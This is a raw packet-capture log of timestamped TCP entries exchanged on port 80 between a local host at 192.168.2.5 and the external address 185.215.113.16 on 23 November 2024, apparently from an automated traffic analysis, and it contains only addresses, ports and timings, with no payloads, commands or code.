                                                                                                                                                                                          Nov 23, 2024 17:44:31.682832956 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682848930 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682863951 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682857990 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682879925 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682895899 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682900906 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682910919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682920933 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682926893 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682938099 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682945013 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682960033 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682971001 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682976007 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.682991982 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683006048 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683022976 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683024883 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683037043 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683047056 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683054924 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683072090 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683073997 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683105946 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683110952 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683120966 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683173895 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683175087 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683191061 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683207035 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683226109 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683238983 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683242083 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683258057 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683263063 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683289051 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683298111 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683305025 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683340073 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683347940 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683365107 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683379889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683393955 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683409929 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683414936 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683418989 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683433056 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683434010 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683451891 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683469057 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683473110 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683485985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683495998 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683502913 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683516979 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683520079 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683537006 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683552027 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683561087 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683569908 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683585882 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683585882 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683600903 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683610916 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683617115 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683633089 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683648109 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683660030 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683661938 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683677912 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683681011 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683692932 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683705091 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683708906 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683725119 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683738947 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683742046 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683757067 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683769941 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.683798075 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.699584961 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.763605118 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.763767004 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.763813972 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.764134884 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.764252901 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.764427900 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.765393019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.765475988 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.765799046 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.766505003 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.766745090 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.766799927 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.767709970 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.767791986 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.767843962 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.768809080 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.768942118 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.769010067 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.769970894 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.770083904 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.770154953 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.771158934 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.771239996 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.771297932 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.772329092 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.772438049 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.772500038 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.773478031 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.773618937 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.773679972 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.774694920 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.774784088 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.774874926 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.775854111 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.775955915 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.776027918 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.776990891 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.777159929 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.777266026 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.778124094 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.778239965 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.778315067 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.779340029 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.779475927 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.779527903 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.782531023 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.782546043 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.782561064 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.782577038 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.782598019 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.782630920 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.783134937 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.783301115 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.783655882 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.784300089 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.784316063 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.784368992 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.785341978 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.785357952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.785408020 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.786268950 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.786380053 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.786449909 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.804512978 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.804529905 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.804584026 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.804639101 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.804655075 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.805315971 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807343960 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807358980 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807400942 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807408094 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807430983 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807471991 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.807881117 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.808176041 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.808228970 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.809293985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.809446096 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.809519053 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.810234070 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.810257912 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.810357094 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.811212063 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.811228991 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.811279058 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.812158108 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.812334061 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.812385082 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.813035965 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.813221931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.813282967 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.814404011 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.814419985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.814471006 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.815301895 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.815464973 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.815519094 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.816175938 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.816250086 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.816298962 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.817250967 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.817548990 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.817837954 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.818294048 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.818309069 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.818356991 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.819240093 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.819401979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.819452047 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.820321083 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.820338011 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.820878029 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.821297884 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.821383953 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.821504116 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.822313070 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.822464943 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.822515011 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.823237896 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.823535919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.823587894 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.824234962 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.824497938 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.824547052 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.825319052 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.825429916 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.825494051 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.826272964 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.826394081 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.826442003 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.827517986 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.827598095 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.827646017 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.828372002 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.828491926 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.828561068 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.829344034 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.829468012 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.829514980 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.830374002 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.830436945 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.830495119 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.831412077 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.831495047 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.831551075 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.832437038 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.832564116 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.832617998 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.833503008 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.833520889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.833633900 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.834462881 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.834566116 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.834638119 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.837292910 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.837308884 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.837323904 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.837363005 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.889246941 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.912897110 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.987349987 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.987366915 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.987453938 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.988008022 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.988250017 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.988313913 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.989017963 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.989104033 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.989157915 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.989886045 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.990200996 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.990320921 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.990375996 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.991275072 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.991364956 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.991421938 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.993213892 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.993268967 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.993290901 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.993308067 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.993355989 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.993537903 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.994309902 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.994359970 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.994395018 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.995444059 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.995560884 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.995609999 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.996408939 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.996455908 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.996505976 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.997601986 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.997724056 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.997772932 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.998495102 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.998857021 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.998914957 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:31.999517918 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.999566078 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:31.999618053 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:32.000444889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:32.000503063 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:32.000550985 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:32.001488924 CET8049732185.215.113.16192.168.2.5
